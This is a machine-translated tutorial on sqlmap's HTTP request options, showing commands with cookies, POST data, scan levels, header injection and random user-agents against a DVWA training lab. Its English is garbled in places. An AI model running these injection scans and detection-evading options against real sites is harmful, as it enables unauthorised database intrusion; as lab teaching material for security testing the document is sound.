Http request parameter setting Sqlmap
--cookie: Specifies the cookie information for the agent login status, to access the target site URL if needed after landing, you need a cookie after landing in conjunction with the past when using sqlmap target URL scanning, or scan sqlmap there may be redirected to the login page, or do not have permission to access this interface
--method: Specifies the http request method, such as POST, GET, DELETE, PUT, etc.
--data: POST request carries parameters, if this option is specified, the default mode is POST request
--param-del: GET or POST parameters default separator, & default, if set to ",", then the format of the GET parameter
?id=1;name=张三,
POST request method needs to be set up by blending options --data
--data="id=1;name=张三"
--level: security level tested (1-5, default 1), the larger the value, the greater the depth scanning
Parameters to be tested: -p
To scan the url is:
http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#Id can only scan parameters, a plurality of fields separated by commas specified by -p
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=rpdbjcqpqmn0gin5uvsospbpvr; security=low" --dbs -p idCustom User-Agent
sqlmap default user-agent is:
sqlmap/1.0-dev-xxxxxxx..The default user-agent server readily identified, may be provided by --user-agent
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --user-agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0"You can also be accessed through the randomly generated target url user-agent, by providing the opening --random-agent
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --random-agentAfter setting --random-agent, from each request will sqlmap installation directory data / txt / user-agents.txt randomly selected in a user-agent request to complete
Sqlmap by injection Http request header parameters
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: test.dvwa.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://test.dvwa.com/vulnerabilities/sqli/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,cy;q=0.6,la;q=0.5
Cookie: PHPSESSID=rpdbjcqpqmn0gin5uvsospbpvr; security=lowCookie can be injected. Http request to save the file header information, through
sqlmap -r 文件名to complete the implantation of the HTTP request header, if need be Cookie injection, it is necessary to set to level 2 or moresqlmap -r 文件 --level=2Sqlmap be injected through the User-Agent. If the User-Agent sqlmap need to be injected needs to be set to level 3 or more
sqlmap -r 文件 --level=3Sqlmap injected through the HOST. Require level set to the maximum scanning depth is 5,5, HTTP header on all scan request parameters, such as Cookie, User-Agent, Referer .. etc.
sqlmap -r 文件 --level=5Sqlmap for implanting Referer needs to be set to level 3 or more
sqlmap -r 文件 --level=3
Additional information provided to the HTTP request header
By providing --headers specify additional header information or modify existing information header, the following command to modify the User-Agent "dagger", and adds a "New Header" header parameter, "\ n" parameters as a plurality of HTTP headers delimiter
sqlmap -r 文件 --headers="User-Agent: dagger\nNew Header: New Header Value"-H --header specify a single HTTP header and parameters, - headers can specify a plurality of parameters HTTP header
May also be provided by sqlmap.conf lower profile [the Request] finished modifying the configuration parameters of the HTTP request header